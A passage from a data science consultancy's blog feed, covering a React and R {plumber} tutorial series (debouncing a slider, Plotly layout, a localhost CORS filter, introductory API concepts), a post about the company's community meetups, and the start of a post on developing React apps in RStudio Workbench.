&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}}/&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The onChange property is the function that is executed when the value of the component changes, in this case the Slider component.
We set the onChange property to call the bound onSliderChange function we created previously. We also wrap the function in the lodash debounce function, making use of one of our npm dependencies.&lt;/p&gt;
&lt;p&gt;The purpose of this is to reduce the number of requests made to the API by only sending a request once the slider value has stopped changing for a set amount of time. If we didn&amp;rsquo;t add this in, every tick of the slider would trigger an HTTP request to our API. We only want to trigger one request once the slider has stopped changing for 60ms.&lt;/p&gt;
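&lt;p&gt;To show what debouncing does, here is a minimal sketch of the idea. It is a simplified illustration, not the lodash implementation. The name simpleDebounce and the optional &lt;code&gt;timers&lt;/code&gt; argument are made up for this example; the latter exists only so the behaviour can be checked without real waiting.&lt;/p&gt;

```javascript
// Minimal debounce sketch (illustration only; the app itself uses the lodash debounce).
// `timers` is a hypothetical injection point that defaults to the real timer functions.
const realTimers = {
  set: (callback, ms) => setTimeout(callback, ms),
  clear: (id) => clearTimeout(id),
};

function simpleDebounce(fn, waitMs, timers = realTimers) {
  let timerId = null;
  return function debounced(...args) {
    // Every new call cancels the pending one, so only the last call in a burst survives.
    if (timerId !== null) {
      timers.clear(timerId);
    }
    timerId = timers.set(() => {
      timerId = null;
      fn(...args);
    }, waitMs);
  };
}

// Simulate a user dragging the slider through three values in quick succession.
const requested = [];
const onChange = simpleDebounce((bins) => requested.push(bins), 60);
onChange(10);
onChange(11);
onChange(12);
// Nothing has been requested yet; after 60 ms of quiet only the last value (12) is used.
```

&lt;p&gt;In the app, the function passed to the debounce wrapper is onSliderChange, so a burst of slider movements results in a single request carrying the final number of bins.&lt;/p&gt;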
&lt;h3 id="plot"&gt;Plot&lt;/h3&gt;
&lt;p&gt;Here we have our plot again with some properties.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;Plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.state.rawdata}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;layout&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of waiting times&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bargap&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; autosize&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xaxis&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Waiting time to next eruption (in mins)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; yaxis&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Frequency&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; useResizeHandler&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; responsive&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the data property reads from &lt;code&gt;this.state.rawdata&lt;/code&gt;. This means that when the state of the App changes via the onSliderChange function, this Plot component will update with the new rawdata state. A Plotly plot also takes a layout object to describe the axes and the styling of the graph.&lt;/p&gt;
&lt;h3 id="boilerplate-cleanup"&gt;Boilerplate Cleanup&lt;/h3&gt;
&lt;p&gt;We can tidy up some boilerplate files that have been generated.
Since we are using Bootstrap for our CSS, we don&amp;rsquo;t need the generated CSS files and can remove them:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;App.css
index.css
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We can also remove the corresponding import line from our index.js file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;./index.css&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="trying-out-the-application"&gt;Trying Out the Application&lt;/h3&gt;
&lt;p&gt;If we run both the App and the {plumber} API and visit the url for the app we will most likely see this:
&lt;img class="image-center" src="HelloReact2.png" alt="Screenshot of empty histogram axes and bins slider set to minimum." style="width:650px; class:image-center"&gt;
Unfortunately, if you try the slider nothing happens. If you open the developer console, you will find that our requests are being blocked by the CORS policy.
This is a browser security feature: by default, a page may not read responses from a different origin unless the server explicitly allows it.&lt;/p&gt;
&lt;h3 id="cross-origin-resource-sharing-cors"&gt;Cross-Origin Resource Sharing (CORS)&lt;/h3&gt;
&lt;p&gt;Cross-origin resource sharing (CORS) is a browser mechanism which enables controlled access to resources located outside of a given domain.
More information on CORS &lt;a href="https://portswigger.net/web-security/cors" rel="external"&gt;can be found here&lt;/a&gt;.
The browser treats our application and our API as different origins because they are running on different ports.
In order to test our app and API locally, we need to append the following filter to the Plumber.R file in our API so that each response includes an Access-Control-Allow-Origin header:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#temporary testing purposes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @filter cors&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cors &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(res) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; res&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;setHeader&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Access-Control-Allow-Origin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;http://localhost:3000&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;forward&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We should be able to restart the API and the slider should now update the graph.
Excellent!
&lt;img class="image-center" src="HelloReact.png" alt="Screenshot of histogram of waiting times with bins slider." style="width:650px; class:image-center"&gt;&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s it for part 2! In part 3 of our series, we will show you how to host on RStudio Connect!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Jumping Rivers and the Data Science Community</title><link>https://www.jumpingrivers.com/blog/jr-and-the-data-science-community/</link><pubDate>Tue, 12 Jul 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jr-and-the-data-science-community/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jr-and-the-data-science-community/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jr-and-the-data-science-community/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At Jumping Rivers, we love data science! Surprised? Didn&amp;rsquo;t think so &amp;hellip; But did you know that as well as providing training and consultancy, we also like to get involved with the data science community?&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re reading this, then you&amp;rsquo;ve already found our blog, where we release weekly posts giving an insight into the projects we do here at JR, as well as hints, tips and tutorials to help you improve your programming. If this is your first trip here, take a look at some of &lt;a href="https://www.jumpingrivers.com/blog/" rel="external"&gt;our previous work&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-jr-and-the-data-science-community"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re lucky enough to be based in the incredible &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;Catalyst building&lt;/a&gt; here in Newcastle upon Tyne, and we make the most of this great space by running regular Meetups for the &lt;a href="https://www.meetup.com/Newcastle-Upon-Tyne-Data-Science-Meetup/" rel="external"&gt;North East Data Scientists&lt;/a&gt; right here. These meetups are free to attend, to make data science accessible to everyone, with all costs generously covered by &lt;a href="https://www.nicd.org.uk/" rel="external"&gt;NICD&lt;/a&gt; and the &lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt; (and &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;JR&lt;/a&gt; of course). Usually consisting of two talks from industry experts as well as our newly introduced pre-event workshops, these events are great opportunities for networking with other like-minded people and learning from your peers.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve been keeping an eye on &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;our Twitter&lt;/a&gt;, you&amp;rsquo;ll know that this October we&amp;rsquo;re going to be running our in-person conference, Shiny in Production. This conference consists of half a day of workshops, followed by a day of talks from some excellent speakers across industry who are going to tell us about all things Shiny! Take a look at the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;event website&lt;/a&gt; to see what we have in store!&lt;/p&gt;
&lt;p&gt;Our JR data scientists can often be found giving talks at conferences - up next we have &lt;a href="https://twitter.com/csgillespie" rel="external"&gt;Colin Gillespie&lt;/a&gt; and &lt;a href="https://twitter.com/nrennie35" rel="external"&gt;Nicola Rennie&lt;/a&gt; giving Lightning Talks at &lt;a href="https://www.rstudio.com/conference/" rel="external"&gt;rstudio::conf&lt;/a&gt;! Upcoming conferences can be found on our &lt;a href="https://www.jumpingrivers.com/community/" rel="external"&gt;communities page&lt;/a&gt;, or for R specifically, we also maintain &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;a list online&lt;/a&gt; with upcoming events, both virtual and in-person.&lt;/p&gt;
&lt;p&gt;We have lots more exciting things in the works as well - we&amp;rsquo;ve already started planning another data science conference for next Spring, and maybe even a workshop with our new partner, &lt;a href="https://h2o.ai/" rel="external"&gt;H2O.ai&lt;/a&gt;, this November &amp;hellip; watch this space!&lt;/p&gt;
&lt;p&gt;If you have any other ideas of how we can get involved, we&amp;rsquo;d love to hear from you! Get in touch via &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;our website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jr-and-the-data-science-community/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Recreating the Shiny App tutorial with a Plumber API + React: Part 1</title><link>https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1/</link><pubDate>Thu, 07 Jul 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of our three-part series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Recreating the Shiny App tutorial with a Plumber API + React: Part 1 (this post)&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2" rel="external"&gt;Recreating the Shiny App tutorial with a Plumber API + React: Part 2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3" rel="external"&gt;Recreating the Shiny App tutorial with a Plumber API + React: Part 3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;RStudio Connect supports a spectrum of data products, static or dynamic.&lt;/p&gt;
&lt;p&gt;Being able to host static content on RStudio Connect means we can host ReactJS applications on the platform. React is a great framework for developing web applications, with a lot of power and flexibility when creating user interfaces. Separating {shiny} applications into a user interface and a data processing API has its advantages.&lt;/p&gt;
&lt;p&gt;In this blog series, we will guide you through creating the application from the RStudio tutorial for creating a {shiny} app, except we&amp;rsquo;ll be attempting it using ReactJS and an R {plumber} API instead of {shiny}. In this blog, part 1, we will be introducing you to the technologies we will need for the tutorial.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r-shiny-plumber-react-part-1"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="what-is-an-api-application-programming-interface"&gt;What is an API? (Application Programming Interface)&lt;/h2&gt;
&lt;p&gt;API stands for application programming interface. An API is a set of software functions and protocols that allow one application to access the features or data of another application. For example, the Google Maps API lets developers embed Google Maps into their own websites. APIs can also be used to allow different applications to communicate with each other. For example, the Twitter API lets developers build applications that post tweets or display tweets from a specific user. APIs are an essential part of many web-based applications, and they are often made available by companies in order to encourage developers to create new products and services that make use of their data or services.&lt;/p&gt;
&lt;p&gt;An API acts as an intermediary layer in front of an application. As long as a client follows the protocol the API specifies for making requests, it does not matter what that client is: a web page, a script, or another service can all be plugged in.&lt;/p&gt;
&lt;p&gt;Here’s how an API works:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A client application initiates an API call, also known as a request, to retrieve information. The request is sent from the application to the web server via the API’s Uniform Resource Identifier (URI) and includes a request verb, headers, and sometimes a request body.&lt;/li&gt;
&lt;li&gt;After receiving a valid request, the API makes a call to the external program or web server.&lt;/li&gt;
&lt;li&gt;The server sends a response to the API with the requested information.&lt;/li&gt;
&lt;li&gt;The API transfers the data to the initial requesting application.&lt;/li&gt;
&lt;/ol&gt;
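&lt;p&gt;To make the first step more concrete, here is a minimal sketch of the pieces a request is made of: a verb, a URI, headers and an optional body. The helper name &lt;code&gt;buildEchoRequest&lt;/code&gt;, the base URL &lt;code&gt;http://localhost:8000&lt;/code&gt; and the &lt;code&gt;/echo&lt;/code&gt; endpoint are assumptions chosen for illustration, not part of any particular API.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;// Hypothetical helper describing the parts of a request (step 1).
// The base URL and the /echo endpoint are assumptions for illustration.
function buildEchoRequest(baseUrl, msg) {
  const url = new URL("/echo", baseUrl);
  url.searchParams.set("msg", msg); // query parameter, URL-encoded for us
  return {
    method: "GET", // request verb
    url: url.toString(), // URI identifying the resource
    headers: { Accept: "application/json" }, // request headers
    body: null // GET requests normally carry no body
  };
}

const request = buildEchoRequest("http://localhost:8000", "hello world");
console.log(request.method, request.url);
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Steps 2 to 4 happen on the server side; the client only has to describe its request in this shape and wait for the response.&lt;/p&gt;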
&lt;h3 id="what-is-plumber"&gt;What is {plumber}?&lt;/h3&gt;
&lt;p&gt;The {plumber} R package helps you create APIs in R. With {plumber}, you annotate ordinary R functions to turn them into a web API that can be called from any language or platform that speaks HTTP, which makes it a convenient way to share your R code with others. The resulting APIs can also be deployed to production servers.&lt;/p&gt;
&lt;p&gt;Here is the example {plumber} API listed at &lt;a href="https://www.rplumber.io/" rel="external"&gt;rplumber.io&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# plumber.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* Echo back the input&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @param msg The message to echo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @get /echo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(msg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(msg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The message is: &amp;#39;&amp;#34;&lt;/span&gt;, msg, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#39;&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* Plot a histogram&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @serializer png&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @get /plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rand &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;(rand)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* Return the sum of two numbers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @param a The first number to add&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @param b The second number to add&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @post /sum&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(a, b) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; a &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; b
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The format is similar to standard R functions but with some additional roxygen2-like comments above them.
The comments are prefixed with &lt;code&gt;#*&lt;/code&gt; and allow {plumber} to make your R functions available as API endpoints.
The annotation directly above each function, such as &lt;code&gt;@get /echo&lt;/code&gt;, sets the HTTP method and path for that endpoint.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;@get - The GET method requests a representation of the specified resource. Requests using GET should only retrieve data.&lt;/li&gt;
&lt;li&gt;@post - The POST method is used to submit an entity to the specified resource, often causing a change in state or side effects on the server.&lt;/li&gt;
&lt;li&gt;@delete - The DELETE method deletes the specified resource.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There are other HTTP request methods, but they are outside the scope of this tutorial. We will only provide a single GET endpoint, which serves the histogram data.&lt;/p&gt;
&lt;p&gt;There are extra parameters and modifiers you can add to change the functionality of your endpoints. Here is a handy &lt;a href="https://github.com/rstudio/cheatsheets/blob/main/plumber.pdf" rel="external"&gt;Cheat Sheet&lt;/a&gt; to refer to for more information on this.&lt;/p&gt;
&lt;h3 id="what-is-react"&gt;What is React?&lt;/h3&gt;
&lt;p&gt;React or ReactJS is a JavaScript library that specializes in helping developers build user interfaces.
You can build encapsulated components that manage their own state, then compose them to make complex user interfaces.&lt;/p&gt;
&lt;p&gt;It is developed by a team at Facebook (now Meta) and is one of the most widely adopted JavaScript libraries for the web, so it comes with a large ecosystem of extensions, feature libraries and community support.
React allows developers to create large web applications that can change data without reloading the page. The main purpose of React is to be fast, scalable, and simple. One of the main concepts in React is state: when the state of a component changes, React rerenders that individual component rather than the whole application.&lt;/p&gt;
&lt;h2 id="why-react-instead-of-shiny"&gt;Why React Instead of {shiny}?&lt;/h2&gt;
&lt;p&gt;For R developers wanting to build basic interactive web pages, {shiny} is an excellent tool. For an R developer to get a simple web app up and running with {shiny} should take little time and effort. Some HTML/CSS knowledge might be necessary to create a {shiny} application, but an R developer should be able to get by with minimal JavaScript understanding.&lt;/p&gt;
&lt;p&gt;However, even though {shiny} supports UI creation, there are processing overheads in generating the output HTML/JavaScript from the {shiny} package functions.
React is optimised for creating UI elements and by separating the UI from the data processing we can reduce the overhead on R and use the extra capacity for data processing.&lt;/p&gt;
&lt;p&gt;Web developers are more likely to be familiar with React than with {shiny}. By separating the two you can combine the strengths of both disciplines: R developers can focus on the data science side of things in R, React developers can focus on frontend design, and the two can meet at the API level to discuss the required functionality to put into the interface between them. This way neither party has to be concerned with the inner workings of the other; they just have to agree on an API protocol as their means of collaboration.&lt;/p&gt;
&lt;p&gt;In reality we could use any frontend web framework and the concept of separating concerns into frontend and backend should still apply. The upcoming tutorial will use React as the frontend framework.&lt;/p&gt;
&lt;p&gt;In part two we will work through an exercise in creating a small React+Plumber app!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Developing React Applications in RStudio Workbench</title><link>https://www.jumpingrivers.com/blog/react-workbench/</link><pubDate>Thu, 30 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/react-workbench/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/react-workbench/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/react-workbench/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;RStudio Workbench provides a development environment for R, Python, and many other languages. When
developing a performant web application you may progress from Shiny towards tools like Plumber. This
allows you to continue development of the true application code, modelling, data processing in the
language you already know, R, while providing an interface to those processes suitable for embedding
in larger web-based applications.&lt;/p&gt;
&lt;p&gt;As a Shiny developer, one popular front-end library you might already be familiar with is React. React
is used in many popular {htmlwidgets} such as &lt;a href="https://glin.github.io/reactable/" rel="external"&gt;{reactable}&lt;/a&gt; and
anything built with &lt;a href="https://react-r.github.io/reactR/" rel="external"&gt;{reactR}&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://reactjs.org/" rel="external"&gt;React&lt;/a&gt; is &lt;em&gt;&amp;ldquo;A JavaScript library for building user interfaces&amp;rdquo;&lt;/em&gt;. It provides
the coupling between your data, application state, and the HTML-based user interface. An optional
extension of JavaScript called JSX allows efficient definition of React based user interface components.
Another optional extension of JavaScript called &lt;a href="https://www.typescriptlang.org/" rel="external"&gt;TypeScript&lt;/a&gt; enables
strict typing of your code, potentially improving the quality.&lt;/p&gt;
&lt;p&gt;This short article covers some technical hurdles you need to clear to use the standard
&lt;a href="https://create-react-app.dev/" rel="external"&gt;Create React App&lt;/a&gt; workflow behind RStudio Workbench. The workflow is compatible with TypeScript, Redux,
and other extensions.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-react-workbench"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="initial-setup"&gt;Initial Setup&lt;/h2&gt;
&lt;p&gt;We are using RStudio Workbench for our development, and VS Code Sessions within Workbench as our IDE.
Some extensions will be installed by default. Our enabled extensions include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/usernamehw/vscode-error-lens" rel="external"&gt;&lt;strong&gt;Error Lens&lt;/strong&gt;&lt;/a&gt;, for better inline error
notifications&lt;/li&gt;
